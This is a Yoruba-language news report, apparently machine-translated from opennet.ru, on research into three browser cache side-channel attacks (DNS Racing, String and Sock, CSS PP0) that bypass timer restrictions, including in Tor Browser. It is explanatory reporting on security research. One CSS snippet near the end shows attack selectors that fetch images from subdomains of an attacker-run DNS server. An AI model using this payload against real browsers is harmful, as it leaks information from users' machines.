Ẹgbẹ kan ti awọn oniwadi lati ọpọlọpọ awọn ile-ẹkọ giga Amẹrika, Israeli ati Ilu Ọstrelia ti ṣe agbekalẹ awọn ikọlu mẹta ti o ṣiṣẹ lori awọn aṣawakiri wẹẹbu lati yọ alaye jade nipa awọn akoonu inu kaṣe ero isise naa. Ọna kan n ṣiṣẹ ni awọn aṣawakiri laisi JavaScript, ati awọn ọna aabo meji miiran ti o wa tẹlẹ ti aabo lodi si awọn ikọlu ikanni ẹgbẹ, pẹlu awọn ti a lo ninu aṣawakiri Tor ati DeterFox. Awọn koodu fun iṣafihan awọn ikọlu, ati awọn paati olupin pataki fun awọn ikọlu naa, ni a tẹjade lori GitHub.
Lati ṣe itupalẹ awọn akoonu ti kaṣe, gbogbo awọn ikọlu lo ọna Prime + Probe, eyiti o pẹlu kikun kaṣe pẹlu eto awọn iye deede ati wiwa awọn ayipada nipa wiwọn akoko iwọle si wọn nigbati o ba tun wọn kun. Lati fori awọn ọna aabo ti o wa ninu awọn aṣawakiri ti o dabaru pẹlu wiwọn akoko deede, ni awọn aṣayan meji, afilọ kan si DNS tabi olupin WebSocket ti o ṣakoso nipasẹ ikọlu, eyiti o tọju akọọlẹ ti akoko awọn ibeere ti o gba. Ni irisi kan, akoko idahun DNS ti o wa titi ni a lo bi itọkasi akoko.
Awọn wiwọn ti a ṣe ni lilo DNS ita tabi awọn olupin WebSocket, ni lilo eto isọdi ti o da lori ẹkọ ẹrọ, to lati ṣe asọtẹlẹ awọn iye pẹlu deede ti o to 98% ni oju iṣẹlẹ ti o dara julọ (apapọ 80-90%). Awọn ọna ikọlu naa ti ni idanwo lori ọpọlọpọ awọn iru ẹrọ ohun elo (Intel, AMD Ryzen, Apple M1, Samsung Exynos) ati ti fihan pe o jẹ gbogbo agbaye.
Iyatọ akọkọ ti ikọlu Ere-ije DNS nlo imuse Ayebaye ti ọna Prime+Probe nipa lilo awọn akojọpọ JavaScript. Awọn iyatọ ṣan silẹ si lilo aago orisun DNS ti ita ati oluṣakoso aiṣedeede, eyi ti o fa nigba igbiyanju lati gbe aworan kan lati agbegbe ti ko si tẹlẹ. Aago ita gba laaye fun ikọlu Prime + Probe lori awọn aṣawakiri ti o fi opin si tabi mu iraye si awọn aago JavaScript patapata.
Fun olupin DNS ti o wa lori nẹtiwọọki Ethernet kanna, deede ti aago jẹ ifoju pe o fẹrẹ to 2 ms, eyiti o to lati ṣe ikọlu ikanni ẹgbẹ kan (fun lafiwe, deede ti aago JavaScript boṣewa ni Tor Browser jẹ dinku si 100 ms). Fun ikọlu naa, iṣakoso lori olupin DNS ko nilo, niwọn igba ti akoko ipaniyan ti iṣẹ naa ti yan lati jẹ ki akoko idahun lati DNS jẹ ami ti ipari iṣaaju ti ayẹwo (da lori boya oluṣakoso apanilaya ti fa. ni iṣaaju tabi nigbamii, ipari ti wa ni kale nipa iyara iṣẹ ayẹwo pẹlu kaṣe) .
Ọna ikọlu keji, “Okun ati Sock”, ni ero lati fori awọn ilana aabo ti o ni ihamọ lilo ipele kekere ti awọn akojọpọ ni JavaScript. Dipo awọn akojọpọ, Okun ati Sock nlo awọn iṣẹ lori awọn okun ti o tobi pupọ, iwọn eyiti a yan ki oniyipada naa bo gbogbo kaṣe LLC (kaṣe ipele ikẹhin). Nigbamii ti, ni lilo iṣẹ indexOf (), a wa okun kekere kan ninu okun, eyiti ko si ni ibẹrẹ ni okun orisun, i.e. awọn abajade isẹ wiwa ni aṣetunṣe lori gbogbo okun. Niwọn bi iwọn laini ṣe deede si iwọn kaṣe LLC, ọlọjẹ n gba ọ laaye lati ṣe iṣẹ ayẹwo kaṣe kan laisi ifọwọyi awọn akojọpọ. Lati wiwọn awọn idaduro, dipo DNS, a ṣe ipe kan si olupin WebSocket ti o ṣakoso nipasẹ ikọlu - ṣaaju ati lẹhin iṣẹ wiwa ti pari, awọn ibeere ni a firanṣẹ ni laini, ti o da lori eyiti olupin ṣe iṣiro idaduro ti a lo lati ṣe itupalẹ kaṣe naa. awọn akoonu.
Iyatọ kẹta ti ikọlu “CSS PP0” jẹ imuse nipasẹ HTML ati CSS, ati pe o le ṣiṣẹ ni awọn aṣawakiri pẹlu JavaScript alaabo. Ọna naa jẹ iru si "Okun ati Sock", ṣugbọn ko so mọ JavaScript. Lakoko ikọlu naa, eto awọn yiyan CSS kan ti ipilẹṣẹ nipasẹ iboju-boju. Okun nla akọkọ ti o kun kaṣe ti ṣeto nipasẹ ṣiṣẹda aami div pẹlu orukọ kilasi ti o tobi pupọ. Inu nibẹ ni a ṣeto ti miiran divs pẹlu ara wọn idamo. Ọkọọkan ninu awọn divs itẹ-ẹiyẹ ni ara tirẹ pẹlu yiyan ti o n wa okun-ọrọ kan. Nigbati o ba n ṣe oju-iwe kan, ẹrọ aṣawakiri naa kọkọ gbiyanju lati ṣe ilana awọn divs inu, eyiti o jẹ abajade ṣiṣe wiwa ni ila nla kan. Wiwa naa ni a ṣe ni lilo iboju-boju ti o sọku mọọmọ ati pe o yori si aṣetunṣe lori gbogbo laini, lẹhin eyi ipo “kii ṣe” ti fa ati igbiyanju lati gbe aworan isale ti n tọka si awọn ibugbe laileto: #pp:not([class*=’xjtoxg’]) #s0 {background-image: url(«https://qdlvibmr.helldomain.oy.ne.ro»);} #pp:not([class*=’gzstxf’]) #s1 {background-image: url(«https://licfsdju.helldomain.oy.ne.ro»);} … X X ...
Subdomains jẹ iranṣẹ nipasẹ olupin DNS ti ikọlu, eyiti o le wọn awọn idaduro ni gbigba awọn ibeere. Olupin DNS n funni ni NXDOMAIN fun gbogbo awọn ibeere ati tọju akọọlẹ ti akoko awọn ibeere gangan. Bi abajade ti sisẹ eto awọn divs kan, olupin DNS ti ikọlu gba ọpọlọpọ awọn ibeere, awọn idaduro laarin eyiti o ṣe ibamu pẹlu abajade ti ṣayẹwo awọn akoonu kaṣe naa.
orisun: opennet.ru